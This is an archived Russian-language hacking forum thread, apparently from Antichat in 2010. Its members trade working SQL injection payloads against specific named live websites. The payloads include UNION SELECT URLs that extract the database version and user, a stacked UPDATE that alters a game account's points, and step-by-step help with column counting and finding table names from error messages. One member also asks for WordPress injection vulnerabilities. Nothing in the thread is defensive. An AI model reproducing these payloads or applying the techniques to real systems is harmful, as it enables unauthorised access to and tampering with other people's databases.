ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
19.11.2010, 19:06
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709
Репутация:
1
|
|
Смотря что ты хочешь... если получить в базе addpoint+1, то да, если увеличить addpoint на единицу, то нет и, кстати, первый апостроф (перед update не нужен)
|
|
|
19.11.2010, 19:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
10390
Репутация:
0
|
|
Сообщение от z0mbyak
z0mbyak said:
Смотря что ты хочешь... если получить в базе addpoint+1, то да, если увеличить addpoint на единицу, то нет и, кстати, первый апостроф (перед union не нужен)
union+update/**/dbo.character/**/set/**/addpoint='addpoint+1'/**/where/**/accountid='killro0000'
Типо так?
|
|
|
|
19.11.2010, 19:17
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709
Репутация:
1
|
|
Если нужен инкремент addpoint, то /set/**/addpoint='addpoint'+1/
без union, это я обшибся малость
Вот пример
http://www.mysql.ru/webboard/index.html?n1=1160&n2=2
|
|
|
|
19.11.2010, 20:55
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от pinch
pinch said:
http://www.diymtb.com.au/displayItems.asp?cid=14'+union+select+1,2,concat(v ersion(),0x3a,database(),0x3a,user()),4,5,6,7,8,9, 10%23
Все равно, не могу найти. Набираю в браузере:
http://www.diymtb.com.au/displayItems.asp?cid=14'+union+select+1,2,user(),4 ,5,6,7,8,9,10%23
и, где выводиться user()?
|
|
|
|
19.11.2010, 21:11
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
дайте ссылки на уязвимости (только php-inj.sql-inj) в Wordpress версии:
2.7
2.9.2
3.0
3.0.1
|
|
|
|
19.11.2010, 21:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
90728
Репутация:
62
|
|
Сообщение от z0mbyak
z0mbyak said:
Если нужен инкремент addpoint, то /set/**/addpoint='addpoint'+1/
без union, это я обшибся малость
Вот пример
http://www.mysql.ru/webboard/index.html?n1=1160&n2=2
ну и кагбэ в инкременте ошиблись немного. кавычки не нужны, совсем.
|
|
|
|
19.11.2010, 22:17
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Помогите подобрать количество столбцов.
http://calidad.com.au/ProdSearchResult.asp?cID=948-BK2'
|
|
|
|
20.11.2010, 01:17
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013
Репутация:
453
|
|
Код:
Code:
http://calidad.com.au/ProdSearchResult.asp?cID=948-BK2' union select 1,2,3,4,5 from CalProd where 1 and '1
Бд - McAccess
Имхо, одна из самых неблагодарных субд для проведения инъекций)
И к тому же из-за наличия второго запроса с иным количеством полей мы не получим вывод)
Так что советую поискать другие параметры, бо (проверил) они там присутствуют.
З.ы - более подробно можно почитать тут:
/threadnav50550-1.html |
|
|
|
20.11.2010, 19:21
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от kamaz
kamaz said:
Код:
Code:
http://calidad.com.au/ProdSearchResult.asp?cID=948-BK2' union select 1,2,3,4,5 from CalProd where 1 and '1
Не могли бы вы уточнить, как вы нашли таблицу from CalProd. Это brutforce или какой то иной способ? Заранее спасибо за ответ.
|
|
|
|
20.11.2010, 20:49
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013
Репутация:
453
|
|
Таблицу нашел исходя из сообщения об ошибке вот тут:
Код:
Code:
http://calidad.com.au/FindProdStep1.asp?MAN=Olivetti%27%29
Других способов узнать имена таблиц (кроме перебора, конечно же) в данном случае нет. Так как доступ к таблице MSysObjects закрыт. |
|
|
|
|
|
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Линейный вид
